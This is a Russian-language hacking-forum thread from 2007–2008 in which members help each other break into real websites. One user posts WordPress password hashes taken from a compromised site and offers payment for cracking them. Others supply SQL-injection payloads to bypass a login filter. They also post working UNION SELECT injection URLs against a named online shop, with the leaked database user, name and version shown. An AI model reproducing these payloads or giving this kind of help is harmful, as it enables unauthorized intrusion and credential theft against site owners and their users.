Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    Ошибка говорит о том, что в БД под именем db таблицы "routines" не существует!
    А дальше ты хоть сам понял, что написал?
    Интересно, что тогда по твоему "information_schema", таблица чтоле?
    information_schema - это название стандартной БД в мускуле 5!)
     
  2. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    Товарищи, прошу совета.

    Добил необходимый мне ресурс. Там стоит походу вродпресс.
    Вытащил значит следующие данные

    (логин::пасс)
    admin::$P$BaDgEI.EOMBqxOK7SWSWJfbPHfiVDT.
    mary::$P$BQOOK8uZGPy9aPW/iZFQdVCYqfFEIe/
    tom::$P$BMUL.P.H2ij4tFvv0RcZ.moF0RWId10


    Это что вообще такое? o_O Это расшифровать реально (если это вообще хэши)?
    Если да-то ткните как плз.
    Я просто первый раз столкнулся, в недоумении...
     
  3. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    похоже на юниксовый мд5, но там вроде на $1$ начинаться должно...
     
    1 person likes this.
  4. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    или md5(phpbb3), что скорее всего
     
  5. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    Значит PasswordsPro мне в руки и долгие годы ожидания и терпимости, или есть иные варианты? Сервисы не берут, в пассвордспро я такого типа хешей вообще не обнаружил, как md5(phpbb3)
    Кто может помочь? Об оплате договоримся ;)
     
  6. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    http://forum.xakep.ru/m_1107118/tm.htm и еще вот тут можно почитать
     
    1 person likes this.
  7. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    Спасибо. Уже вникаю =)
     
  8. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    _Pantera_,
    Ошибки свои понял.
    Спасибо!
     
    1 person likes this.
  9. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Пытаюсь авторизоватся по типу
    email:pass
    Мыло не знаю, поэтому ввожу от балды. Кавычки фильтруются
    Как можно обойти фильтрацию и авторизоватся?
     
  10. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    По всей видимости есть sql-инъекция, попробуй найти табличку юзеров/админов, там должно быть достаточно информации, чтобы пройти авторизацию ; )
     
  11. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    По логике t_customer. Я поискал, иньекция только в авторизации.
    и только в поле логина
     
  12. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    будет работать когда
    обойти фильтр кавычки можна так: %27,%2527,` в разных случаях по разному, тоесть пример

    mail:[email protected]%2527 or 1=1/*
    pass:
     
    #3852 sabe, 27 Nov 2008
    Last edited: 27 Nov 2008
  13. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    c вами бесполезно спорить вы второй раз читаете пост по диагонали надо быть внимательнее.
    Ershik после обратного слеша одна ковычка? никак если данные не попадают в urldecode()
     
  14. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Понятно. еще вопрос.
    __http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8.9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*

    почему, когда хочу узнать версию базы данных, выскакиет ошибка?
    ___http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,database(),4,5,6,7,8.9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*
     
  15. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    проблемы с кодировкой используй конструкцию aes_decrypt(aes_encrypt())

    /add jokester опередил с примером '(
     
    #3855 l1ght, 28 Nov 2008
    Last edited: 28 Nov 2008
  16. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Неа. Это не помогает. почему-то.
     
  17. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    отлично помогает :)
    http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,UNHEX(HEX(concat_ws(0x3a,User(),Database(),Version()))),4,5,6,7,8.9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*

    administrator@localhost:gestione:4.1.11-Debian_4sarge7-log

    И это тоже разумеется :
    http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,User(),Database(),Version()),1),1),4,5,6,7,8.9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*
     
    #3857 Kakoytoxaker, 28 Nov 2008
    Last edited: 28 Nov 2008
    2 people like this.
  18. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Я осознал.
    Спасибо :)
     
  19. SHS

    SHS Elder - Старейшина

    Joined:
    4 Aug 2008
    Messages:
    53
    Likes Received:
    2
    Reputations:
    1
    При исполнении следующих запросов :

    page.php?id=-1'+order+by+3/* :

    Unknown column '3' in 'order clause' (Казалось бы все нормально, НО!)

    page.php?id=-1'+order+by+2/*

    Выдает :

    Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause

    Что это означает? И как это победить?
     
  20. foopi

    foopi Member

    Joined:
    26 Oct 2008
    Messages:
    41
    Likes Received:
    20
    Reputations:
    5
    так мож тут 2 колонки.
    попробуй терь page.php?id=-1'+union+select+1,2/*
     
Thread Status:
Not open for further replies.